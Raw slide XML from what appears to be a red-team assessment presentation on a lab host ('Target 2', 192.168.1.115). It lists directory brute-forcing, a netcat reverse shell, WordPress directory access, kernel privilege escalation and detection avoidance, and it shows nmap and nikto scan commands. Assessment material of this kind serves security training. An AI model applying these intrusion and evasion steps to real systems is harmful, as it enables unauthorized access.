          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFCA54"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="95250" dir="216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5000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="5000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit vulnerabilities in the kernel to escalate privileges.</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="290" name="Google Shape;290;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514480" y="8505550"/>
            <a:ext cx="21433650" cy="4462900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="95250" dir="216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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="288"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28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90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14"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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377650" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;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19</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13961600" y="10797475"/>
            <a:ext cx="9684600" cy="2313600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB0000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="540303"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="71438" dist="171450" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>TARGET “2”</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p19"/>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3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This document contains the following resources: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930900" y="5167543"/>
            <a:ext cx="6322500" cy="2405400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320375" y="5167573"/>
            <a:ext cx="6322500" cy="4048200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Target 1 &amp; Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17065350" y="5169568"/>
            <a:ext cx="6322500" cy="2138700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Methods Used to Avoiding Detect</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136" name="Google Shape;136;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985650" y="7572950"/>
            <a:ext cx="3792925" cy="3792925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="Google Shape;137;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10109900" y="7016868"/>
            <a:ext cx="4743450" cy="4048125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Google Shape;138;p19"/>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8330138" y="7572950"/>
            <a:ext cx="3792925" cy="3792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1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="136"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="134"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="350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1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="137"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="135"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="24" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1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Critical Vulnerabilities: Target 2</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;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20</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301000" y="2685425"/>
            <a:ext cx="22272000" cy="18294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1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000"/>
              <a:t>Offensive assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="306" name="Google Shape;306;p37"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1052813" y="4751550"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3F651852-49E8-4B44-9917-7EA4C5F3A083}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7023900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7824000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7423950">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="172935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2039625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute-force URL dir and files</a:t>
                      </a:r>
                      <a:endParaRPr sz="3300">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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This allows to guess of which directories system contains </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This vulnerability reveals the structure of the system</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910525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Netcat reverse shell/remote execution vulnerability</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The reverse shell was achieved with bash script and netcat listener</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Gained remote access to the system </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2029475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3300">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unrestricted access to wordpress directories</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The access to system gave unrestricted access to all files and directories</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This vulnerability gave full unauthorized access to the system </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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30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06"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11"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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning: Nmap and nikto enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;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21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171325" y="3619950"/>
            <a:ext cx="5481000" cy="1600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600" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands used:</a:t>
            </a:r>
            <a:endParaRPr sz="4600" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap &amp; Nikto</a:t>
            </a:r>
            <a:endParaRPr sz="4100" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2066800"/>
            <a:ext cx="24377700" cy="7908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1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Red Team was able to penetrate Target 2 and retrieve the following confidential data.</a:t>
            </a:r>
            <a:endParaRPr sz="4200" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="5983100"/>
            <a:ext cx="11378400" cy="6913800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFCA54"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="3571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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Steps &amp; Commands:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="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800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>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Exposed services, command:</a:t>
            </a:r>
            <a:endParaRPr sz="280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US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;nmap -sV 192.168.1.115 -P</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>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This scan identifies the services below as potential points of entry.</a:t>
            </a:r>
            <a:endParaRPr sz="280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2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>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Web Server enumeration with nikto, command:</a:t>
            </a:r>
            <a:endParaRPr sz="280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US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;nikto -C all -h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
